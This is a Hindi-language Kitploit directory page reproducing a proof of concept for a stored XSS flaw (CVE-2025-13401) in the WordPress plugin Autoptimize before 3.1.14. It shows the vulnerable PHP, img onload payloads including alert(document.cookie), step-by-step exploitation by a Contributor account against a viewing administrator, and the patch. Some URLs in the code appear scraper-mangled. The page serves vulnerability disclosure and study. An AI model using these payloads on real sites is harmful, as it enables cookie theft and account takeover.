Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13401-XSS-Stored | Kitploit
उपकरण/GitHubGitHub/ciscocamelo/cve-2025-13401-xss-stored
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubciscocamelo/cve-2025-13401-xss-stored

CVE-2025-13401-XSS-Stored

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रमाण अवधारणा: Autoptimize < 3.1.14 में संग्रहीत XSS

कमजोरी: प्रमाणित (Contributor+) संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) प्रभावित संस्करण: Autoptimize <= 3.1.13 पैच किया गया संस्करण: Autoptimize 3.1.14 फ़ाइल: classes/autoptimizeImages.php

विवरण

यह कमजोरी classes/autoptimizeImages.php के भीतर create_img_preload_tag() विधि में मौजूद है। यह फ़ंक्शन सामग्री में पाई गई छवियों के लिए <link rel="preload"> टैग उत्पन्न करने के लिए ज़िम्मेदार होता है, जब छवि अनुकूलन या प्रीलोडिंग सक्षम होती है।

संस्करण 3.1.13 में, फ़ंक्शन मूल `` टैग को <link> टैग में बदलने से पहले title, alt, class, id, width, और height जैसे विशिष्ट एट्रिब्यूट्स को हटाने के लिए "ब्लैकलिस्ट" दृष्टिकोण (preg_replace के माध्यम से) का उपयोग करता है। हालाँकि, यह onload या onerror जैसे इवेंट हैंडलर एट्रिब्यूट्स को हटाने में विफल रहता है।

एक प्रमाणित हमलावर (कम से कम Contributor भूमिका के साथ) किसी पोस्ट में एक दुर्भावनापूर्ण `` टैग एम्बेड कर सकता है। जब प्लगइन इस पोस्ट को प्रीलोड लिंक उत्पन्न करने के लिए संसाधित करता है, तो दुर्भावनापूर्ण इवेंट हैंडलर बना रहता है और <link> टैग के अंदर पृष्ठ के <head> में इंजेक्ट हो जाता है। चूँकि <link rel="preload"> onload इवेंट का समर्थन करता है, JavaScript तब निष्पादित होती है जब संसाधन लोड होता है।

कमजोर कोड (v3.1.13)

root@kitploit:~
// classes/autoptimizeImages.php

public static function create_img_preload_tag( $tag ) {
    // ...
    // rewrite img tag to link preload img.
    $_from = array( '<img ', ' src="https://raw.githubusercontent.com/ciscocamelo/cve-2025-13401-xss-stored/HEAD/," sizes=', ' srcset=' );
    $_to   = array( '<link rel="preload" as="image" ', ' href=', ' imagesizes=', ' imagesrcset=' );
    $tag   = str_replace( $_from, $_to, $tag );

    // INSUFFICIENT SANITIZATION: Only removes specific attributes
    $tag = preg_replace( '/ ((?:title|alt|class|id|loading|fetchpriority|decoding|data-no-lazy|width|height)=".*")/Um', '', $tag );
    // ...
    return $tag;
}

प्रमाण अवधारणा चरण

आवश्यक शर्तें

  1. Autoptimize संस्करण 3.1.13 स्थापित करें।
  2. "Optimize Images" सक्षम करें या सुनिश्चित करें कि छवि प्रीलोडिंग सक्रिय है (उदाहरण के लिए, "Preload specific requests" या छवियों पर कार्य करने वाले डिफ़ॉल्ट व्यवहार के माध्यम से)।
    • नोट: कमजोर फ़ंक्शन create_img_preload_tag अक्सर व्यूपोर्ट में पाई गई छवियों या स्पष्ट रूप से प्रीलोड की गई छवियों के लिए ट्रिगर होता है।

पेलोड

root@kitploit:~
<img src="https://example.com/image.jpg" onload="alert('XSS_POC_SUCCESS')">

शोषण

  1. Contributor भूमिका (या उच्चतर) वाले उपयोगकर्ता के रूप में लॉगिन करें।
  2. एक नई पोस्ट बनाएँ।
  3. पोस्ट सामग्री में पेलोड इंजेक्ट करें (Custom HTML ब्लॉक या कोड एडिटर का उपयोग करके)।
    root@kitploit:~
    <!-- Malicious Image -->
    <img src="https://raw.githubusercontent.com/ciscocamelo/cve-2025-13401-xss-stored/HEAD/wp-content/plugins/autoptimize/classes/external/js/lazysizes.min.js" onload="alert(document.cookie)">
    
  4. पोस्ट सहेजें।
  5. किसी व्यवस्थापक (Administrator) द्वारा पोस्ट देखने की प्रतीक्षा करें (या स्वयं इसे देखें)।
  6. Autoptimize प्लगइन `` टैग को पार्स करेगा।
  7. यह HTML स्रोत में एक प्रीलोड लिंक उत्पन्न करेगा:
    root@kitploit:~
    <link rel="preload" as="image" href="/wp-content/plugins/autoptimize/classes/external/js/lazysizes.min.js" onload="alert(document.cookie)">
    
    नोट: width, height आदि एट्रिब्यूट हटाए जा सकते हैं, लेकिन onload बना रहता है।
  8. ब्राउज़र <link> टैग को पार्स करता है, संसाधन को प्रीलोड करता है, और onload इवेंट को फायर करता है, जिससे XSS निष्पादित होता है।

v3.1.14 में सुधार

पैच ब्लैकलिस्ट regex को wp_kses() से बदल देता है, जो उत्पन्न <link> टैग के लिए अनुमत एट्रिब्यूट्स की एक सख्त व्हाइटलिस्ट सक्षम करता है।

root@kitploit:~
// classes/autoptimizeImages.php v3.1.14

$allowed_html = array(
    'link' => array(
        'rel'           => true,
        'as'            => true,
        'href'          => true,
        'imagesizes'    => true,
        'imagesrcset'   => true,
        'type'          => true,
        'media'         => true,
    ),
);
$tag = wp_kses( $tag, $allowed_html );
टूल डाउनलोड करें